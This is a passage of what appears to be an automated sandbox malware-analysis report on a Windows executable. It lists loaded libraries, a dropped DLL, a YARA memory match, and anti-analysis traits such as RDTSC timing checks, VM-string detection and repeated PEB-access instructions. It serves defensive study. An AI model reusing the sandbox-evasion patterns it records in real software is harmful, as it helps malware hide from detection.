      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: 0GuwV0t2UU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: 0GuwV0t2UU.exe, 00000006.00000001.3135162309.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: 0GuwV0t2UU.exe, 00000006.00000003.3501913064.0000000037715000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000003.3499817992.000000003756B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 0GuwV0t2UU.exe, 0GuwV0t2UU.exe, 00000006.00000003.3501913064.0000000037715000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000003.3499817992.000000003756B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: 0GuwV0t2UU.exe, 00000006.00000001.3135162309.0000000000649000.00000008.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.3136688190.00000000049AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_738B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_738B1BFF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_738B30C0 push eax; ret 0_2_738B30EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378C27FA pushad ; ret 6_2_378C27F9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378C225F pushad ; ret 6_2_378C27F9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F09AD push ecx; mov dword ptr [esp], ecx6_2_378F09B6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378C283D push eax; iretd 6_2_378C2858
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile created: C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI/Special instruction interceptor: Address: 4C6D03F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI/Special instruction interceptor: Address: 2DFD03F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeRDTSC instruction interceptor: First address: 4C2BA61 second address: 4C2BA61 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F09C4E04E97h 0x00000006 cmp bl, FFFFFF9Fh 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeRDTSC instruction interceptor: First address: 2DBBA61 second address: 2DBBA61 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F09C50BED97h 0x00000006 cmp bl, FFFFFF9Fh 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796D1C0 rdtsc 6_2_3796D1C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI coverage: 0.1 %
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exe TID: 2032Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
      Source: 0GuwV0t2UU.exe, 00000006.00000002.3541241912.000000000783D000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000003.3500358754.000000000783D000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000006.00000003.3500504716.000000000783D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI call chain: ExitProcess graph end nodegraph_0-4524
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI call chain: ExitProcess graph end nodegraph_0-4521
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3796D1C0 rdtsc 6_2_3796D1C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379335C0 NtCreateMutant,LdrInitializeThunk,6_2_379335C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_738B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_738B1BFF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF78A mov eax, dword ptr fs:[00000030h]6_2_379AF78A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791D7B0 mov eax, dword ptr fs:[00000030h]6_2_3791D7B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C37B6 mov eax, dword ptr fs:[00000030h]6_2_379C37B6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AD7B0 mov eax, dword ptr fs:[00000030h]6_2_379AD7B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AD7B0 mov eax, dword ptr fs:[00000030h]6_2_379AD7B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF7BA mov eax, dword ptr fs:[00000030h]6_2_378EF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797F7AF mov eax, dword ptr fs:[00000030h]6_2_3797F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797F7AF mov eax, dword ptr fs:[00000030h]6_2_3797F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797F7AF mov eax, dword ptr fs:[00000030h]6_2_3797F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797F7AF mov eax, dword ptr fs:[00000030h]6_2_3797F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797F7AF mov eax, dword ptr fs:[00000030h]6_2_3797F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379797A9 mov eax, dword ptr fs:[00000030h]6_2_379797A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F57C0 mov eax, dword ptr fs:[00000030h]6_2_378F57C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F57C0 mov eax, dword ptr fs:[00000030h]6_2_378F57C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F57C0 mov eax, dword ptr fs:[00000030h]6_2_378F57C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FD7E0 mov ecx, dword ptr fs:[00000030h]6_2_378FD7E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F7703 mov eax, dword ptr fs:[00000030h]6_2_378F7703
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F5702 mov eax, dword ptr fs:[00000030h]6_2_378F5702
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F5702 mov eax, dword ptr fs:[00000030h]6_2_378F5702
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792F71F mov eax, dword ptr fs:[00000030h]6_2_3792F71F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792F71F mov eax, dword ptr fs:[00000030h]6_2_3792F71F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379CB73C mov eax, dword ptr fs:[00000030h]6_2_379CB73C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379CB73C mov eax, dword ptr fs:[00000030h]6_2_379CB73C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379CB73C mov eax, dword ptr fs:[00000030h]6_2_379CB73C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379CB73C mov eax, dword ptr fs:[00000030h]6_2_379CB73C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37925734 mov eax, dword ptr fs:[00000030h]6_2_37925734
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F3720 mov eax, dword ptr fs:[00000030h]6_2_378F3720
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F720 mov eax, dword ptr fs:[00000030h]6_2_3790F720
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F720 mov eax, dword ptr fs:[00000030h]6_2_3790F720
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3790F720 mov eax, dword ptr fs:[00000030h]6_2_3790F720
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B972B mov eax, dword ptr fs:[00000030h]6_2_379B972B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF72E mov eax, dword ptr fs:[00000030h]6_2_379AF72E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F973A mov eax, dword ptr fs:[00000030h]6_2_378F973A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F973A mov eax, dword ptr fs:[00000030h]6_2_378F973A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9730 mov eax, dword ptr fs:[00000030h]6_2_378E9730
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E9730 mov eax, dword ptr fs:[00000030h]6_2_378E9730
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799375F mov eax, dword ptr fs:[00000030h]6_2_3799375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799375F mov eax, dword ptr fs:[00000030h]6_2_3799375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799375F mov eax, dword ptr fs:[00000030h]6_2_3799375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799375F mov eax, dword ptr fs:[00000030h]6_2_3799375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3799375F mov eax, dword ptr fs:[00000030h]6_2_3799375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37903740 mov eax, dword ptr fs:[00000030h]6_2_37903740
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37903740 mov eax, dword ptr fs:[00000030h]6_2_37903740
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37903740 mov eax, dword ptr fs:[00000030h]6_2_37903740
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C3749 mov eax, dword ptr fs:[00000030h]6_2_379C3749
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB765 mov eax, dword ptr fs:[00000030h]6_2_378EB765
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB765 mov eax, dword ptr fs:[00000030h]6_2_378EB765
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB765 mov eax, dword ptr fs:[00000030h]6_2_378EB765
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EB765 mov eax, dword ptr fs:[00000030h]6_2_378EB765
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797368C mov eax, dword ptr fs:[00000030h]6_2_3797368C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797368C mov eax, dword ptr fs:[00000030h]6_2_3797368C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797368C mov eax, dword ptr fs:[00000030h]6_2_3797368C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797368C mov eax, dword ptr fs:[00000030h]6_2_3797368C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378ED6AA mov eax, dword ptr fs:[00000030h]6_2_378ED6AA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378ED6AA mov eax, dword ptr fs:[00000030h]6_2_378ED6AA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E76B2 mov eax, dword ptr fs:[00000030h]6_2_378E76B2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E76B2 mov eax, dword ptr fs:[00000030h]6_2_378E76B2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E76B2 mov eax, dword ptr fs:[00000030h]6_2_378E76B2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB6C0 mov eax, dword ptr fs:[00000030h]6_2_378FB6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB6C0 mov eax, dword ptr fs:[00000030h]6_2_378FB6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB6C0 mov eax, dword ptr fs:[00000030h]6_2_378FB6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB6C0 mov eax, dword ptr fs:[00000030h]6_2_378FB6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB6C0 mov eax, dword ptr fs:[00000030h]6_2_378FB6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378FB6C0 mov eax, dword ptr fs:[00000030h]6_2_378FB6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B16CC mov eax, dword ptr fs:[00000030h]6_2_379B16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B16CC mov eax, dword ptr fs:[00000030h]6_2_379B16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B16CC mov eax, dword ptr fs:[00000030h]6_2_379B16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379B16CC mov eax, dword ptr fs:[00000030h]6_2_379B16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF6C7 mov eax, dword ptr fs:[00000030h]6_2_379AF6C7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379216CF mov eax, dword ptr fs:[00000030h]6_2_379216CF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AD6F0 mov eax, dword ptr fs:[00000030h]6_2_379AD6F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791D6E0 mov eax, dword ptr fs:[00000030h]6_2_3791D6E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791D6E0 mov eax, dword ptr fs:[00000030h]6_2_3791D6E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379836EE mov eax, dword ptr fs:[00000030h]6_2_379836EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379836EE mov eax, dword ptr fs:[00000030h]6_2_379836EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379836EE mov eax, dword ptr fs:[00000030h]6_2_379836EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379836EE mov eax, dword ptr fs:[00000030h]6_2_379836EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379836EE mov eax, dword ptr fs:[00000030h]6_2_379836EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379836EE mov eax, dword ptr fs:[00000030h]6_2_379836EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379236EF mov eax, dword ptr fs:[00000030h]6_2_379236EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3792F603 mov eax, dword ptr fs:[00000030h]6_2_3792F603
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37921607 mov eax, dword ptr fs:[00000030h]6_2_37921607
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F3616 mov eax, dword ptr fs:[00000030h]6_2_378F3616
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378F3616 mov eax, dword ptr fs:[00000030h]6_2_378F3616
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378EF626 mov eax, dword ptr fs:[00000030h]6_2_378EF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379C5636 mov eax, dword ptr fs:[00000030h]6_2_379C5636
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37929660 mov eax, dword ptr fs:[00000030h]6_2_37929660
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_37929660 mov eax, dword ptr fs:[00000030h]6_2_37929660
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3798D660 mov eax, dword ptr fs:[00000030h]6_2_3798D660
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E758F mov eax, dword ptr fs:[00000030h]6_2_378E758F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E758F mov eax, dword ptr fs:[00000030h]6_2_378E758F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_378E758F mov eax, dword ptr fs:[00000030h]6_2_378E758F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797B594 mov eax, dword ptr fs:[00000030h]6_2_3797B594
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3797B594 mov eax, dword ptr fs:[00000030h]6_2_3797B594
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3791F5B0 mov eax, dword ptr fs:[00000030h]6_2_3791F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379835BA mov eax, dword ptr fs:[00000030h]6_2_379835BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379835BA mov eax, dword ptr fs:[00000030h]6_2_379835BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379835BA mov eax, dword ptr fs:[00000030h]6_2_379835BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379835BA mov eax, dword ptr fs:[00000030h]6_2_379835BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_379AF5BE mov eax, dword ptr fs:[00000030h]6_2_379AF5BE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 6_2_3798D5B0 mov eax, dword ptr fs:[00000030h]6_2_3798D5B0
